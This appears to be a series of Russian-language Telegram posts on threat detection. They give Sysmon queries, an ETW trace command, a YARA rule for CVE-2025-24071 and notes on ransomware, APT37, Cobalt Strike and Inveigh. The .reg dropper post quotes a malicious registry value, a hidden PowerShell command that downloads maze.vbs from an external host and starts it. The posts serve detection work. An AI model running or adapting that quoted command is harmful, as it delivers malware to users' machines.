Вернемся к теме с шифровальщиками 😱

Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением 💻

Список расширений и названий записок можно посмотреть здесь:
🔤 https://github.com/dannyroemhild/ransomware-fileext-list
🔤 https://github.com/mthcht/awesome-lists/blob/main/Lists/ransomware_extensions_list.csv
🔤 https://gist.github.com/sfponce/7c49269ed5a81f2a55dad39dc7cef5ad

⚠️ Событие Sysmon EventId 11, регистрирует только создание нового файла.

Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW

logman create trace "Microsoft-Windows-Kernel-File" -p Microsoft-Windows-Kernel-File -o "C:\Logs\Microsoft-Windows-Kernel-File.etl"

Можно добавить в конфиг сисмона имена записок и дать название правилу - Ransomware, тогда в событиях создания файла сразу будет отображено, на что стоит обратить внимание.

#detection@detectioneasy

В ряде дроперов пополнение, хакеры используют *.reg-файлы 🩸



reg-файлы позволяют изменить значения ключей реестра.

В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.

При открытии reg-файла событие запуска процесса будет содержать

"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"  

Данный файл создает ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значением

cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs

Такое поведение мы можем обнаружить:

🔤 создание процесса

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)

🔤 Создание reg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.reg"

🔤 Добавим детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"

Сэмпл в any.run

#detection@detectioneasy
#ttp@detectioneasy

В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)

🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud

Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK

#ttp@detectioneasy
#detection@detectioneasy

Вышел релиз Cobalt Strike 4.11, много интересных изменений. Меня больше зацепило использование DNS over HTTPS (DoH) для взаимодействия с сервером. Готовы к обнаружению?)

Список публичных DoH/DoT резолверов и еще один

Список всех обновлений CS 🐎 можно найти здесь

#ttp@detectioneasy

Очередной NTLM Response disclosure (CVE-2025-24071), вначале было интересно) сейчас хочется верить, что у всех закрыт доступ на внешние smb

Можем обнаружить 🔭:

🔤 В логах Security и Sysmon поискать сессии к порту 445

ProviderName="Microsoft-Windows-Security-Auditing" and EventId=5156 and DestAddress not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestPort=445
  

ProviderName="Microsoft-Windows-Sysmon" and EventId=3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort=445

🔤 создание файла с раширением .library-ms

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith  "\\Users\\.*\.library-ms"

🔤 yara имеет смысл поискать в директориях пользователея (проверил, не фолсило)

rule detect_malicious_library_ms {
    meta:
        description = "Detects library-ms files with a search connector pointing"
        author = "@d3f0x0 @detectioneasy"
        reference = "CVE-2025-24071"
        date = "2025-03-19"
        score = 80

    strings:
        $xml_decl = /<\?xml\s+version\s*=\s*["']1\.0["']\s+encoding\s*=\s*["']UTF-8["']\s*\?>/ nocase
        
        $namespace = "https://schemas.microsoft.com/windows/2009/library"
        
        $url_pattern1 = /<url\b[^>]*>\s*\\\\/ wide ascii
        $url_pattern2 = /<\/url>/ wide ascii

        $connector_open = "<searchConnectorDescription>" wide ascii
        $connector_close = "</searchConnectorDescription>" wide ascii

    condition:
        all of ($xml_decl, $namespace, $url_pattern1, $url_pattern2 ) and
        2 of ($connector_open, $connector_close)
}

#detection@detectioneasy

Всем привет ✌️
Многими любимый Responder получил свое отражение на Powershell и C# в проекте Inveigh

Атакующие стараются не использовать его plaintext'ом и обфусцируют powershell или используют свой интерпретатор

Если Вам попались ребята, которые просто сделали git clone или скачали Release 👶 , проблем с ними нет

🔭 Обнаруживаем:
🔤 создание файлов с именем Inveigh
🔤 в логах Powershell вхождение inveigh, relay

Если хакеры подготовились обфусцировались, принесли с собой свой интерпретатор powershell:

🔤 Скорее всего оставили стандартное название логов, отслеживаем создание файлов по маскам

    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
    $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"

🔤 если уже сильно запарились, и все поменяли, то формат хранения NTLMv2 Response, вряд ли будут менять, и в целом лог работы программы, поэтому берем строки вывода логов из скрипта формируем в yara и идем в поход по директориям пользователей

🔤 и для самых крутых, отойдем от tool-based, поднимемся выше по пирамиде боли к TTP 🤘

❗️ Суть атаки авторизовать на себя как можно больше хостов, для этого нужно поднять определенные сервера и заставить других клиентов подключаться к себе

Скорее всего подобного рода утилиты будут применяться в начале killchain для сбора учетных записей и информации об окружающей среде. Это дает нам вариант для профилирования поведения хостов.

🔤 Если у вас увеличилось количество подключений к хосту или в целом забиндились новые порты на пользовательских тачках - стоит проверить процесс, к которому подключаются.

🔤 Или наоборот, если хосты в широковещательном домене начали неожиданно подключаться к одному из хостов - необходимо его проверить

#detection@detectioneasy